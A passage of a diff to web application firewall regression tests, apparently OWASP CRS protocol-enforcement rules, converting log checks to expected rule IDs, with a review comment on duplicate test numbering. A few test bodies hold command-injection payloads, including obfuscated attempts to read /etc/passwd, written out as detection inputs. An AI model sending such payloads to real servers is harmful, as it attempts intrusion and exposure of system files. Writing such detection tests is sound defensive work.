11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 output: - log_contains: id "920390" + log: + expect_ids: [920390] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml index d3ec8759c..07b08ad60 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml @@ -858,7 +858,8 @@ tests: ----------111111111-- version: "HTTP/1.1" output: - log_contains: "id \"920400\"" + log: + expect_ids: [920400] - test_id: 2 stages: - input: @@ -881,4 +882,5 @@ tests: ----------111111-- version: "HTTP/1.1" output: - no_log_contains: "id \"920400\"" + log: + no_expect_ids: [920400] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920410.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920410.yaml index 588060aac..e7e82400e 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920410.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920410.yaml @@ -886,7 +886,8 @@ tests: ----------111111-- version: "HTTP/1.1" output: - log_contains: "id \"920410\"" + log: + expect_ids: [920410] - test_id: 2 stages: - input: @@ -909,4 +910,5 @@ tests: ----------111111-- version: "HTTP/1.1" output: - no_log_contains: "id \"920410\"" + log: + no_expect_ids: [920410] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml index ca4446f44..be0c56158 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, Franziska Bühler, azurit" - description: "Description" rule_id: 920420 tests: - test_id: 1 
@@ -19,7 +18,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920420\"" + log: + no_expect_ids: [920420] - test_id: 2 stages: - input: @@ -35,7 +35,8 @@ tests: data: "test" version: "HTTP/1.1" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] - test_id: 3 stages: - input: @@ -51,7 +52,8 @@ tests: data: "test" version: "HTTP/1.1" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] - test_id: 4 stages: - input: @@ -67,7 +69,8 @@ tests: data: "test" version: "HTTP/1.1" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] - test_id: 5 desc: Request content type is not allowed by policy (920420) from old modsec regressions stages: @@ -102,7 +105,8 @@ tests: BINARYDATA --0000-- output: - log_contains: id "920420" + log: + expect_ids: [920420] - test_id: 6 desc: Request content type is not allowed by policy (920420) from old modsec regressions stages: @@ -137,7 +141,8 @@ tests: BINARYDATA --0000-- output: - log_contains: id "920420" + log: + expect_ids: [920420] - test_id: 7 desc: Request content type is not allowed by policy (920420) from old modsec regressions stages: @@ -172,7 +177,8 @@ tests: BINARYDATA --0000-- output: - log_contains: id "920420" + log: + expect_ids: [920420] - test_id: 8 stages: - input: @@ -188,7 +194,8 @@ tests: data: "test" version: "HTTP/1.1" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] - test_id: 9 stages: - input: @@ -204,7 +211,8 @@ tests: data: "test" version: "HTTP/1.1" output: - no_log_contains: "id \"920420\"" + log: + no_expect_ids: [920420] - test_id: 10 stages: - input: @@ -220,7 +228,8 @@ tests: data: "test" version: "HTTP/1.1" output: - no_log_contains: "id \"920420\"" + log: + no_expect_ids: [920420] - test_id: 11 stages: - input: @@ -236,7 +245,8 @@ tests: data: "test" version: "HTTP/1.1" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] - test_id: 12 stages: - input: 
@@ -252,7 +262,8 @@ tests: data: "test" version: "HTTP/1.1" output: - no_log_contains: "id \"920420\"" + log: + no_expect_ids: [920420] - test_id: 13 stages: - input: @@ -268,7 +279,8 @@ tests: data: "test" version: "HTTP/1.1" output: - no_log_contains: "id \"920420\"" + log: + no_expect_ids: [920420] - test_id: 14 stages: - input: @@ -284,7 +296,8 @@ tests: data: 'cmd=/bin/unxz -c /var/log/something_sensitive.xz' version: "HTTP/1.1" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] - test_id: 15 stages: - input: @@ -301,7 +314,8 @@ tests: version: HTTP/1.0 data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] - test_id: 16 stages: - input: @@ -318,7 +332,8 @@ tests: version: HTTP/1.0 data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] - test_id: 17 stages: - input: @@ -335,4 +350,5 @@ tests: version: HTTP/1.0 data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml index f91450320..21b412ddb 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920430 tests: - test_id: 1 @@ -16,7 +15,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" output: - no_log_contains: "id \"920430\"" + log: + no_expect_ids: [920430] - test_id: 2 stages: - input: 
@@ -29,7 +29,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" output: - no_log_contains: "id \"920430\"" + log: + no_expect_ids: [920430] - test_id: 3 stages: - input: @@ -55,7 +56,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" output: - no_log_contains: "id \"920430\"" + log: + no_expect_ids: [920430] - # Currently FTW won't process HTTP 1.0 simple response items # This request generates such a response, so even though it will # generate the alert, it will error. @@ -116,7 +118,8 @@ tests: uri: "/" version: HTTP/4.0 output: - log_contains: id "920430" + log: + expect_ids: [920430] - test_id: 9 desc: HTTP protocol version is not allowed by policy (920430) from old modsec regressions stages: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml index 49c45b14e..bc8950b96 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml @@ -21,7 +21,8 @@ tests: uri: "/get/foo.bak" version: HTTP/1.1 output: - log_contains: id "920440" + log: + expect_ids: [920440] - test_id: 2 desc: URL file extension is restricted by policy (920440) from old modsec regressions stages: @@ -40,7 +41,8 @@ tests: uri: "/get/foo.db" version: HTTP/1.1 output: - log_contains: id "920440" + log: + expect_ids: [920440] - test_id: 3 desc: URL file extension is restricted by policy (920440) from old modsec regressions stages: @@ -59,7 +61,8 @@ tests: uri: "/get/foo.old" version: HTTP/1.1 output: - log_contains: id "920440" + log: + expect_ids: [920440] - test_id: 4 desc: URL file extension is restricted by policy (920440) - GH issue 1296 stages: 
@@ -78,7 +81,8 @@ tests: uri: "/get/foo.bar.sql" version: HTTP/1.1 output: - log_contains: id "920440" + log: + expect_ids: [920440] - test_id: 5 desc: Redis dump file stages: @@ -97,7 +101,8 @@ tests: uri: "/get/dump.rdb" version: HTTP/1.1 output: - log_contains: id "920440" + log: + expect_ids: [920440] - test_id: 6 desc: Redis dump file, URI encoded stages: @@ -116,4 +121,5 @@ tests: uri: "/get/dump%2Erdb" version: HTTP/1.1 output: - log_contains: id "920440" + log: + expect_ids: [920440] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml index cb52a798f..abb5712cf 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, karelorigin, azurit" - description: "Description" rule_id: 920450 tests: - test_id: 1 @@ -17,7 +16,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920450\"" + log: + expect_ids: [920450] - test_id: 2 stages: - input: @@ -31,7 +31,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920450\"" + log: + expect_ids: [920450] - test_id: 3 stages: - input: @@ -45,7 +46,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920450\"" + log: + expect_ids: [920450] - test_id: 4 desc: HTTP header is restricted by policy (920450) from old modsec regressions, we no longer block proxy-connection in 3.0 stages: @@ -64,7 +66,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: id "920450" + log: + no_expect_ids: [920450] - test_id: 5 desc: HTTP header is restricted by policy (920450) from old modsec regressions stages: @@ -84,7 +87,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: id "920450" + log: + expect_ids: [920450] - test_id: 6 stages: - input: 
@@ -98,7 +102,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920450\"" + log: + no_expect_ids: [920450] - test_id: 7 stages: - input: @@ -112,4 +117,5 @@ tests: Content-Encoding: deflate version: "HTTP/1.1" output: - log_contains: "id \"920450\"" + log: + expect_ids: [920450] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920451.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920451.yaml index ac96c09a4..f1268ebc0 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920451.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920451.yaml @@ -18,7 +18,8 @@ tests: Accept-Charset: UTF-8 version: "HTTP/1.1" output: - log_contains: id "920451" + log: + expect_ids: [920451] - test_id: 2 desc: "Send a Content-Range header, which should be blocked but by this rule's sibling rule, not by this rule" stages: @@ -33,4 +34,5 @@ tests: Content-Range: bytes 4096-8192/8192 version: "HTTP/1.1" output: - no_log_contains: id "920451" + log: + no_expect_ids: [920451] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml index dcbf0897a..1317921e3 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920460 tests: - test_id: 1 @@ -18,10 +17,11 @@ tests: Content-Type: "application/x-www-form-urlencoded" User-Agent: "OWASP CRS test agent" data: 'file=cat+/etc/\passw\d' - stop_magic: true + autocomplete_headers: false version: "HTTP/1.1" output: - log_contains: "id \"920460\"" + log: + expect_ids: [920460] - test_id: 2 stages: - input: 
@@ -34,7 +34,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920460\"" + log: + expect_ids: [920460] - test_id: 3 stages: - input: @@ -47,7 +48,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920460\"" + log: + expect_ids: [920460] - test_id: 4 stages: - input: @@ -60,7 +62,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920460\"" + log: + no_expect_ids: [920460] - test_id: 5 stages: - input: @@ -73,4 +76,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920460\"" + log: + no_expect_ids: [920460] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml index 3d6213c06..6a68b4dfa 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml @@ -18,7 +18,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920470\"" + log: + expect_ids: [920470] - test_id: 2 stages: - input: @@ -33,7 +34,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920470\"" + log: + expect_ids: [920470] - test_id: 3 stages: - input: @@ -48,7 +50,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 4 stages: - input: @@ -64,7 +67,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 5 stages: - input: 
@@ -79,7 +83,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 6 stages: - input: @@ -95,7 +100,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 7 stages: - input: @@ -111,7 +117,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 8 stages: - input: @@ -127,7 +134,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 9 stages: - input: @@ -143,7 +151,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 10 stages: - input: @@ -159,7 +168,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 11 stages: - input: @@ -175,7 +185,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 12 stages: - input: @@ -191,7 +202,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920470\"" + log: + expect_ids: [920470] - test_id: 13 stages: - input: @@ -207,7 +219,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 14 stages: - input: @@ -223,7 +236,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 15 stages: - input: @@ -239,7 +253,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 16 stages: - input: @@ -255,7 +270,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 17 stages: - input: 
@@ -271,7 +287,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 18 desc: "Status Page Test - Illegal Content-Type header: 'text/xml; blah' where blah isn't a valid parameter for this header field" stages: @@ -287,4 +304,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920470\"" + log: + expect_ids: [920470] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml index 04ad0542f..3d18bfad0 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, azurit" - description: "Description" rule_id: 920480 tests: - test_id: 1 @@ -17,7 +16,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "test=value" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 2 stages: - input: @@ -31,7 +31,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "test=value" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 3 stages: - input: @@ -45,7 +46,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "test=value" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 4 stages: - input: @@ -59,7 +61,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "test=value" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 5 stages: - input: 
@@ -73,7 +76,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "test=value" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 6 stages: - input: @@ -89,7 +93,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 2 stages: - input: @@ -103,7 +108,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "test=value" output: - log_contains: "id \"920480\"" + log: + expect_ids: [920480] - test_id: 8 stages: - input: @@ -117,7 +123,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "test=value" output: - log_contains: "id \"920480\"" + log: + expect_ids: [920480] - test_id: 9 stages: - input: @@ -133,8 +140,9 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920480\"" - - test_id: 3 + log: + no_expect_ids: [920480] + - test_id: 10 stages: - input: dest_addr: "127.0.0.1" @@ -149,8 +157,9 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920480\"" - - test_id: 4 + log: + no_expect_ids: [920480] + - test_id: 11 stages: - input: dest_addr: "127.0.0.1" @@ -164,7 +173,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "test=value" output: - log_contains: "id \"920480\"" + log: + expect_ids: [920480] - test_id: 12 stages: - input: @@ -180,7 +190,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 5 stages: - input: 
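Review bot: Renumbering `test_id: 3` to `10` and `test_id: 4` to `11` in this hunk and the next creates new collisions instead of removing them: a `test_id: 10` (commented out) and an active `test_id: 11` (the ibm037 double-charset case) already exist later in this file, and other duplicates remain visible in the surrounding hunks (a second `test_id: 2` after test 6, `test_id: 5` after test 12, and a second 7 and 8). Duplicate ids make the test's name ambiguous for per-platform overrides and for selecting a single test by name, so a regression in one of the twins can be masked by its sibling. I would renumber the whole file sequentially in one pass rather than patching two entries, e.g. the entries after test 9 become `10` … `n` in order, and adjust any override entries that reference the old names.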
